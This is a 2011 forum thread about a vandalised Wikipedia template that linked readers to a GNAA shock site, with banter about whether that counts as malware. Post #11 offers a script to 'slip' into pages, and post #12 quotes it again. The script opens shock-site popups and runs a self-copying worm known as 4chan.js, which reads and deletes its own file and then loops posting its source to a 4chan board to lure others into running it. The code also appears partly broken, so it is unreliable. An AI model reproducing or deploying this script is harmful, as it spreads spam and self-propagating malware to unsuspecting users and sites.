| carbuncle |
Sun 21st August 2011, 3:44pm
Post
#1
Fat Cat. Group: Regulars; Posts: 1,601; Joined: Sun 30th Mar 2008, 4:48pm; Member No.: 5,544
There is a report on the admin noticeboard that certain pages were causing malware infections. Some quotes:
QUOTE
:IF YOU CLICKED ON THE VANDALIZED PAGE. If you have, especially if you are running Idiotically Exploding and your AV software did not go crazy, I strongly suggest you kill your browser sessions and do a full scan of your computer. I tried right clicking for source... then left clicking to get focus... and before I could right click again, my AV software got very upset.
QUOTE
It's very disturbing that someone managed to mount that kind of attack. I can live with the NSFW pictures popping unexpectedly around here, but malware injection?? FuFoFuEd (talk) 03:38, 21 August 2011 (UTC)
QUOTE
I believe the malware site was under the domain feenode.net (the homepage is a shock site with gruesome images and audio—don't go there!), which is apparently owned by GNAA (see [33] archive) Would an admin add this domain to the edit filter or the spam blacklist? Thanks, Goodvac (talk) 05:03, 21 August 2011 (UTC)
QUOTE
I used Firefox 5, did not click on anything in that page, but still got infected with something that moves my browser window randomly around and fills it with some gory pic. It's fine for a while after I kill the process but then starts again. Avira can't find anything. Any suggestions? FuFoFuEd (talk) 06:10, 21 August 2011 (UTC)
While there is no real evidence that this was done by the GNAA, it seems that a GNAA-owned page is involved, and some members recently got blocked on WP. The page/template involved has been revdeleted and there isn't much detail in the report, but if someone has found a way to actually infect WP readers' computers, that might put a bit of a dent in WP's hit count.
| SB_Johnny |
Sun 21st August 2011, 4:27pm
Post
#2
It wasn't me who made honky-tonk angels. Group: Regulars; Posts: 2,128; Joined: Mon 15th Sep 2008, 3:10pm; Member No.: 8,272
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
| Jon Awbrey |
Sun 21st August 2011, 9:12pm
Post
#3
τὰ δέ μοι παθήματα μαθήματα γέγονε. Group: Moderators; Posts: 6,738; Joined: Sun 6th Apr 2008, 4:52am; From: Meat Puppet Nation; Member No.: 5,619
Silly Rabbit, Wikipedia IS Malware …
Jon
| Detective |
Sun 21st August 2011, 9:23pm
Post
#4
|
Senior Member. Group: Contributors; Posts: 321; Joined: Thu 9th Dec 2010, 11:17am; Member No.: 35,179
QUOTE
I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
QUOTE
Silly Rabbit, Wikipedia IS Malware … Jon
I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)
| Zoloft |
Sun 21st August 2011, 9:38pm
Post
#5
May we all find solace in our dreams. Group: Regulars; Posts: 1,332; Joined: Fri 15th Jan 2010, 11:08pm; From: Erewhon; Member No.: 16,621
QUOTE
I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
QUOTE
Silly Rabbit, Wikipedia IS Malware … Jon
QUOTE
I'm missing something here. Aren't you two in complete agreement? How does that make SBJ a silly rabbit? (Now if we were discussing Wikiversity ...)
No two people are in complete agreement. Jon is just ensuring that SBJ never gets his hands on delicious Kix cereal. Some humans are malware. GNAA is a convenient collection of such people.
This post has been edited by Zoloft: Sun 21st August 2011, 9:39pm
| Milton Roe |
Sun 21st August 2011, 10:00pm
Post
#6
Known alias of J. Random Troll. Group: Regulars; Posts: 10,209; Joined: Thu 28th Feb 2008, 1:03am; Member No.: 5,156
QUOTE
Some humans are malware. GNAA is a convenient collection of such people.
Randolph Churchill, son of the Prime Minister and a rather nasty alcoholic, once upon a time developed a colon tumor which had to be removed. It proved not to be cancer. Some wag said "What a shame to cut out of Randolph the only part that is NOT malignant...."
| melloden |
Sun 21st August 2011, 10:11pm
Post
#7
Group: Contributors; Posts: 450; Joined: Tue 30th Nov 2010, 4:43pm; Member No.: 34,482
The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
| SB_Johnny |
Sun 21st August 2011, 10:29pm
Post
#8
It wasn't me who made honky-tonk angels. Group: Regulars; Posts: 2,128; Joined: Mon 15th Sep 2008, 3:10pm; Member No.: 8,272
QUOTE
The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
Actually it wasn't Meepsheep, it was an edit to a widely used and unprotected template by a throwaway account. Looking at the code, it looks like trying to click on any link from the article would have landed on the GNAA page. I doubt this will be anything near the last time someone employs the trick, and done to scale it could seriously mess up Wikipedia for a while. Maybe that "image filter" will need to be reset to use whitelists rather than blacklist categories...
| Michaeldsuarez |
Sun 21st August 2011, 11:31pm
Post
#9
Über Member. Group: Contributors; Posts: 554; Joined: Mon 9th Aug 2010, 7:51pm; From: New York, New York; Member No.: 24,428
QUOTE
The malware isn't in Wikipedia. I was lucky enough to look at the page source just before the revision was deleted, and it was Meepsheep (is he with the GNAA now?), using a transparent image covering the entire screen and linking to the typical GNAA shock site with a bunch of popups that never end.
http://encyclopediadramatica.ch/Last_Measure
| Meepsheep |
Thu 22nd September 2011, 2:40am
Post
#10
Neophyte. Group: Contributors; Posts: 16; Joined: Wed 21st Sep 2011, 1:45am; Member No.: 66,900
So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
| Mr.Treason II |
Tue 27th September 2011, 6:42pm
Post
#11
Junior Member. Group: Contributors; Posts: 62; Joined: Thu 30th Jun 2011, 8:00am; Member No.: 58,445
QUOTE
So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
If you're careful, there is NO MALWAREZ. The Hoser's site got Javascripted, so just slip some javascript like this
CODE
<script type="text/javascript"> <!-- window.open( "http://www.feenode.net/" ) window.open( "http://www.WPReview.on.nimpfullofmalware.org/" ) k="Content-Disposition: form-data; name=" function r(){ return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) ) } f = WSH.createobject("scripting.filesystemobject") g = f.opentextfile(WSH.scriptfullname) h = g.readall() g.close() f.deletefile( WSH.scriptfullname ) function 4chan; { x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h a = WSH.createobject( "msxml2.xmlhttp" ) while(1) { a.open( "get", "http://img.4chan.org/b", 0 ) a.send() b = a.responsetext c = b.substr( b.indexOf( "res/" ) + 4, 8 ) d = "" e = "" for( i = 0; i < 20; i++ ) d += r() for( i = 0; i < 8; i++ ) e += r() a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 ) t = "multipart/form-data; boundary=" + d a.setrequestheader( "Content-Type", t ) a.send("--" + d + "\r\n" + k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" + k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" + k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" + k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" + k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" + k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" + k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" ) WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) ) } } 4chan.js(); //--> </script>
| Meepsheep |
Tue 11th October 2011, 4:20am
Post
#12
Neophyte. Group: Contributors; Posts: 16; Joined: Wed 21st Sep 2011, 1:45am; Member No.: 66,900
QUOTE
So I alter an unprotected template to include some dongs and a link to Last Measure, and it's automatically malware? Lolwut?
QUOTE
If you're careful, there is NO MALWAREZ. The Hoser's site got Javascripted, so just slip some javascript like this
CODE
<script type="text/javascript"> <!-- window.open( "http://www.feenode.net/" ) window.open( "http://www.WPReview.on.nimpfullofmalware.org/" ) k="Content-Disposition: form-data; name=" function r(){ return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) ) } f = WSH.createobject("scripting.filesystemobject") g = f.opentextfile(WSH.scriptfullname) h = g.readall() g.close() f.deletefile( WSH.scriptfullname ) function 4chan; { x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h a = WSH.createobject( "msxml2.xmlhttp" ) while(1) { a.open( "get", "http://img.4chan.org/b", 0 ) a.send() b = a.responsetext c = b.substr( b.indexOf( "res/" ) + 4, 8 ) d = "" e = "" for( i = 0; i < 20; i++ ) d += r() for( i = 0; i < 8; i++ ) e += r() a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 ) t = "multipart/form-data; boundary=" + d a.setrequestheader( "Content-Type", t ) a.send("--" + d + "\r\n" + k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" + k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" + k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" + k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" + k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" + k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" + k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" ) WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) ) } } 4chan.js(); //--> </script>
Oh god, 4chan.js, takes me back man
This post has been edited by Meepsheep: Tue 11th October 2011, 4:20am
| Kelly Martin |
Tue 11th October 2011, 1:45pm
Post
#13
Bring back the guttersnipes! Group: Regulars; Posts: 3,270; Joined: Sun 22nd Jun 2008, 4:41am; From: EN61bw; Member No.: 6,696
QUOTE
Is this a first? I don't remember actual malware being slipped into a mediawiki page before (not counting mediawiki, of course).
No, not the first time. There's been about a half-dozen instances of people using Wikipedia (or Wikimedia Commons) to spread malware that I've heard of. There are some phenomenally stupid security holes in IE that, to be honest, Tim Starling and Brion Vibber have bent over backwards to secure MediaWiki against. MediaWiki now has some fairly sophisticated code in it to screen uploaded files for malicious content; that code is there to block exploits that actually happened on Wikipedia or on Commons. Even so, there are doubtless still infected files in Commons; I'd not be surprised if a good portion of the porn there carries malware payloads, especially anything uploaded prior to mid-2007.